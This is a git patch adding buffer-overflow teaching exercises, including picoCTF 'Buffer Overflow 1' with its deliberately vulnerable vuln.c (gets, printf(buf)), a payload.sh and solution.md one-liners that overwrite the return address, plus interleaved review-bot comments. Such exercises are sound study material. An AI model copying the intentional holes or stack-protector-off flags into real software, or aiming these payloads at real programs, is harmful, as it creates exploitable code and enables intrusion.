From 525e0ca1cc7a5ff4591e5088a1197b5e1d7b787d Mon Sep 17 00:00:00 2001
From: Valentin Brandl
Date: Wed, 28 Sep 2022 19:22:48 +0200
Subject: [PATCH] Examples and stuff
---
 assets/logic/.gitignore | 1 +
 assets/logic/Makefile | 16 +++++++
 assets/{ => logic}/logic.c | 6 ++-
 assets/logic/solution.md | 8 ++++
 assets/picoctf/buffer_overflow_1/.gitignore | 1 +
 assets/picoctf/buffer_overflow_1/payload.sh | 17 ++++++++
 assets/picoctf/buffer_overflow_1/solution.md | 10 +++++
 assets/picoctf/buffer_overflow_1/vuln | Bin 0 -> 15704 bytes
 assets/picoctf/buffer_overflow_1/vuln.c | 42 +++++++++++++++++++
 9 files changed, 100 insertions(+), 1 deletion(-)
 create mode 100644 assets/logic/.gitignore
 create mode 100644 assets/logic/Makefile
 rename assets/{ => logic}/logic.c (79%)
 create mode 100644 assets/logic/solution.md
 create mode 100644 assets/picoctf/buffer_overflow_1/.gitignore
 create mode 100755 assets/picoctf/buffer_overflow_1/payload.sh
 create mode 100644 assets/picoctf/buffer_overflow_1/solution.md
 create mode 100644 assets/picoctf/buffer_overflow_1/vuln
 create mode 100644 assets/picoctf/buffer_overflow_1/vuln.c
diff --git a/assets/logic/.gitignore b/assets/logic/.gitignore
new file mode 100644
index 0000000..e2250f7
--- /dev/null
+++ b/assets/logic/.gitignore
@@ -0,0 +1 @@
+logic
diff --git a/assets/logic/Makefile b/assets/logic/Makefile
new file mode 100644
index 0000000..a9a0bc4
--- /dev/null
+++ b/assets/logic/Makefile
@@ -0,0 +1,16 @@
+# use bash so process substutution is available
+CC = gcc
+CFLAGS = -fno-stack-protector -g
+SHELL = bash
+SRC = logic.c
+TARGET = $(SRC:%.c=%)
+
+.PHONY: build
+build: $(TARGET)
+
+%: %.c
+ $(CC) ${CFLAGS} $< -o $@
+
+.PHONY: clean
+clean:
+ rm -f logic
diff --git a/assets/logic.c b/assets/logic/logic.c
similarity index 79%
rename from assets/logic.c
rename to assets/logic/logic.c
index ba6bab4..2812eee 100644
--- a/assets/logic.c
+++ b/assets/logic/logic.c
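Review bot: The `clean` rule hardcodes the artifact name (`rm -f logic`) while `build` derives it from `TARGET`, so changing `SRC` would leave a stale binary behind; `rm -f $(TARGET)` keeps the two rules in step. `CFLAGS = -fno-stack-protector -g` switches the stack canary off, presumably so the overwrite walked through in solution.md is observable, but nothing in the file says so — a comment such as `# stack protector disabled on purpose: the exercise is to overflow buf in logic.c` stops this from being copied as a general build setting. The recipe line mixes `$(CC)` with `${CFLAGS}`; one bracket style is enough. The first comment also has a typo ("substutution").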
@@ -3,7 +3,7 @@ void foo(char *input) { int is_logged_in = 0; - char buf[50]; + char buf[64]; strcpy(buf, input); if (is_logged_in) { puts("logged in!!1!"); @@ -13,5 +13,9 @@ void foo(char *input) { } int main(int argc, char **argv) { + if (argc != 2) { + return 1; + } foo(argv[1]); + return 0; } diff --git a/assets/logic/solution.md b/assets/logic/solution.md new file mode 100644 index 0000000..9d56b39 --- /dev/null +++ b/assets/logic/solution.md @@ -0,0 +1,8 @@ +# Beispiel 1 + + * Debugger `gdb` + * `list` für Code + * `break ` für Breakpoint + * `run $(python -c 'print("A"*77)')` + * `show is_logged_in` + * `continue` diff --git a/assets/picoctf/buffer_overflow_1/.gitignore b/assets/picoctf/buffer_overflow_1/.gitignore new file mode 100644 index 0000000..c2981a9 --- /dev/null +++ b/assets/picoctf/buffer_overflow_1/.gitignore @@ -0,0 +1 @@ +payload diff --git a/assets/picoctf/buffer_overflow_1/payload.sh b/assets/picoctf/buffer_overflow_1/payload.sh new file mode 100755 index 0000000..c25475a --- /dev/null +++ b/assets/picoctf/buffer_overflow_1/payload.sh @@ -0,0 +1,17 @@ +#!/usr/bin/env bash + +function repeat() { + n="${1}" + string="${2}" + printf "%${n}s" | tr " " "${string}" +} + +function main() { + buffer_size="${1}" + address="${2}" + filler="$(repeat "${buffer_size}" A)" + newline="\n" + printf "%s%b%b" "${filler}" "${address}" "${newline}" +} + +main "${@}" diff --git a/assets/picoctf/buffer_overflow_1/solution.md b/assets/picoctf/buffer_overflow_1/solution.md new file mode 100644 index 0000000..480011c --- /dev/null +++ b/assets/picoctf/buffer_overflow_1/solution.md @@ -0,0 +1,10 @@ +# PicoCTF - Buffer Overflow 1 + +https://play.picoctf.org/practice/challenge/258?category=6&page=1 + + * Buffergröße bestimmen + * Return Adresse überschreiben + * Adresse der Zielfunktion finden `nm -g -C vuln` + * Little Endian! + * `./payload.sh 44 "\xf6\x91\x04\x08" | nc ...` + * `perl -e 'print "A"x44 . "\xf6\x91\x04\x08\n"'` 
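Review bot: `strcpy(buf, input)` into the enlarged `char buf[64]` is still an unbounded copy, and since that is the behaviour the exercise is built around, the line should say so rather than read as an oversight: `strcpy(buf, input); /* deliberately unbounded: the exercise overflows buf into is_logged_in */`. Growing the buffer from 50 to 64 moves the overflow offset; the `"A"*77` in solution.md presumably already reflects the new size plus padding, but it is worth re-checking against a fresh build. Whether `is_logged_in` actually lies beyond `buf` in the frame depends on the compiler's layout and on `-fno-stack-protector`, so the comment should also name the compiler and flags the walkthrough assumes. The rest of foo's body lies outside this hunk.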
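Review bot: The new `if (argc != 2) { return 1; }` guard in main exits silently, so running the binary without an argument gives no hint what went wrong; print a usage line first, `fprintf(stderr, "usage: %s <input>\n", argv[0]);`. That needs `<stdio.h>`, which the existing `puts` call suggests is already included, though the include block is outside this hunk.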
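Review bot: Every variable in `repeat` and `main` (`n`, `string`, `buffer_size`, `address`, `filler`, `newline`) is assigned without `local`, so they leak into the global shell scope; declare them `local` (e.g. `local n="${1}"`). `repeat` also builds its printf format from the first argument, so a missing or non-numeric count produces a printf error rather than a clear message; a guard at the top of `main` such as `[[ "${1}" =~ ^[0-9]+$ ]] || { echo "usage: ${0} <count> <bytes>" >&2; exit 1; }` covers that. `tr " " "${string}"` maps a space to the first character of `string` only, which is fine for the single-character filler the script is used with but would silently truncate anything longer.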
diff --git a/assets/picoctf/buffer_overflow_1/vuln b/assets/picoctf/buffer_overflow_1/vuln new file mode 100644 index 0000000000000000000000000000000000000000..6b42c3e96d8df7a75398327e6d631b32930c598e GIT binary patch literal 15704 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 literal 0 HcmV?d00001 diff --git a/assets/picoctf/buffer_overflow_1/vuln.c b/assets/picoctf/buffer_overflow_1/vuln.c new file mode 100644 index 0000000..e2dcd2c --- /dev/null +++ b/assets/picoctf/buffer_overflow_1/vuln.c 
@@ -0,0 +1,42 @@
+#include
+#include
+#include
+#include
+#include
+#include "asm.h"
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+
+void win() {
+ char buf[FLAGSIZE];
+ FILE *f = fopen("flag.txt","r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+
+ fgets(buf,FLAGSIZE,f);
+ printf(buf);
+}
+
+void vuln(){
+ char buf[BUFSIZE];
+ gets(buf);
+
+ printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
+}
+
+int main(int argc, char **argv){
+
+ setvbuf(stdout, NULL, _IONBF, 0);
+
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+
+ puts("Please enter your string: ");
+ vuln();
+ return 0;
+}
+
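Review bot: `#include "asm.h"` and the `get_return_address()` call in `vuln` reference a header that is not among the nine files in this commit's diffstat, so vuln.c cannot be rebuilt from the repository as committed; either add `asm.h` next to it or state in a header comment that only the prebuilt `vuln` binary is used and the source is kept for reference. The standard-library include names do not survive in this rendering, so I cannot check them here. As this is the upstream picoCTF challenge source, `gets(buf)` and `printf(buf)` are the intended bugs and should stay, but a one-line comment at the top, such as `/* picoCTF "Buffer Overflow 1" challenge source, kept verbatim; gets() and printf(buf) are the intended vulnerabilities */`, makes that explicit for readers of this repo. Separately, `win` never closes `f` and ignores the `fgets` return value — harmless for the challenge, but worth knowing if the file is ever edited.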